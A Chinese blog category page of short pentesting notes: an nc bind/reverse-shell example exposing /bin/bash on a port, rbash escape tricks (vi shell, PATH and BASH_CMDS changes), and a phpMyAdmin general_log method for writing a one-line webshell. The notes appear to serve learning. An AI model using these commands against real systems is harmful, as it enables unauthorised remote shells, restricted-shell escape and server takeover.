shell
文章平均质量分 54
反弹 转发 绕过
道长在此
成为强者!
展开
-
反弹shell
nc受害主机# 开启本地8080端口监听,并将本地的bash发布出去。nc -lvvp 8080 -t -e /bin/bash攻击主机nc 172.21.230.72 8080 #连接受害主机的bash不支持-e[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DrtD27Ak-1618662609473)(C:\Users\86184\AppData\Roaming\Typora\typora-user-images\image-2021041717原创 2021-04-17 20:31:25 · 113 阅读 · 0 评论 -
Rbash绕过
RbashVI绕过vi:set shell=/bin/sh运行shell:shellexport PATH=/usr/sbin:/usr/bin:/sbin:/binCP绕过cp 环境变量绕过BASH_CMDS[a]=/bin/sh;a 注:把/bin/bash给a变量`export PATH=$PATH:/bin/ 注:将/bin 作为PATH环境变量导出export PATH=$PATH:/usr/bin 注:将/usr/bin作为PATH环境变量导原创 2021-04-17 20:29:34 · 525 阅读 · 0 评论 -
日志getshell
phpmyadmin日志getshell设置日志文件上传一句话木马查看是否成功蚁剑或菜刀getshellgetshell成功 在进入别人的phpmyadmin数据库后可以采用日志getshell具体过程如下设置日志文件 设置general_log = ONgeneral_log_file = 网站根目录的php文件上传一句话木马执行sql语句密码为cmd查看是否成功找到上传的地址蚁剑或菜刀getshellgetshell成功最后可使用反弹shel原创 2021-04-23 20:45:50 · 369 阅读 · 0 评论